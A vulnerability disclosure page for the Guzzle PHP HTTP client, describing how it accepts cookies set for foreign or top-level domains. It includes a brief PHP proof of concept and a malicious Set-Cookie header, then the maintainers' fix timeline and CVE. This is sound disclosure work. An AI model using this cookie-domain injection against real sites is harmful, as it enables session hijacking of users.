Set cookie for different domain in guzzle/guzzle

Valid

Reported on

May 9th 2022


Description

It is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header.

Proof of Concept

<?php
require "vendor/autoload.php";
$client = new \GuzzleHttp\Client(["cookies" => true]);
$client->request("GET", "https://<id>.free.beeceptor.com/setcookie");
$cookies = $client->getConfig('cookies')->toArray();
print_r($cookies);
?>

You can use beeceptor to mock the endpoint, just add the following header to the response: "Set-Cookie": "poc=1; Domain=huntr.dev"

Also works with .com as domain, this would send the cookie to all .com domains.

Impact

The vulnerability is capable of stealing sessions if the right conditions are met.

We are processing your report and will contact the guzzle team within 24 hours. a year ago
We have contacted a member of the guzzle team and are waiting to hear back a year ago
Graham Campbell validated this vulnerability a year ago

Thanks for reporting this. We will co-ordinate with stakeholders and provide an update within 10 working days.

myxl has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the guzzle team. We will try again in 7 days. a year ago
Graham Campbell
a year ago

Maintainer


We are aware of this issue, and we will prepare a fix next week.

We have sent a second fix follow up to the guzzle team. We will try again in 10 days. a year ago
Graham Campbell
a year ago

Maintainer


We have a fix in progress. We will provide another update on Monday.

Graham Campbell
a year ago

Maintainer


We have a proposed fix in place. We are sending it for 3rd party review. We expect to be able to release a fix before the end of May.

Graham Campbell
a year ago

Maintainer


We have been allocated CVE-2022-29248.

Graham Campbell
a year ago

Maintainer


We have just released v6.5.6 and v7.4.3 and published the advisory. This is now fixed, and the embargo is lifted.

Graham Campbell marked this as fixed in v7.4.3 with commit 74a860 a year ago
Graham Campbell has been awarded the fix bounty
This vulnerability will not receive a CVE
CookieJar.php#L160-L218 has been validated
to join this conversation